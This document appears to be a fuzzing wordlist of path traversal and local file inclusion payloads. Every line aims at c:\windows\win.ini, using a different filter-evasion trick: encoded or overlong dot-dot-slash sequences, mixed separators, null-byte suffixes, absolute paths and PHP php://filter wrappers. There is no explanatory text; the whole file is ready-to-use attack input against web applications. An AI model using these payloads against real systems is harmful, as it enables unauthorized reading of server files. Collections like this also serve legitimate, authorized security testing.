/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/windows/win.ini
..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c/windows/win.ini
/./././././././././././windows/win.ini
/../../../../../../../../../../../windows/win.ini
/..\../..\../..\../..\../..\../..\../windows/win.ini
/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini
..//..//..//..//..//windows//win.ini
../../../../../../../../../../../../windows/win.ini
../../windows/win.ini
..\../..\../..\../..\../windows/win.ini
..\../..\../windows/win.ini
..\..\..\..\..\..\..\..\..\..\windows\win.ini
\..\..\..\..\..\..\..\..\..\..\windows\win.ini
/../../../../../../../../../../../windows/win.ini%00
../../../../../../../../../../../../windows/win.ini%00
..\..\..\..\..\..\..\..\..\..\windows\win.ini%00
/../../../../../../../../../../../windows/win.ini%00.html
/../../../../../../../../../../../windows/win.ini%00.jpg
..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../windows/win.ini
../../../../../../../../windows/win.ini
..\..\..\..\..\..\..\..\windows\win.ini
c:\windows\win.ini
c:/windows/win.ini
php://filter/zlib.deflate/convert.base64-encode/resource=c:/windows/win.ini
php://filter/zlib.deflate/convert.base64-encode/resource=c:\windows\win.ini
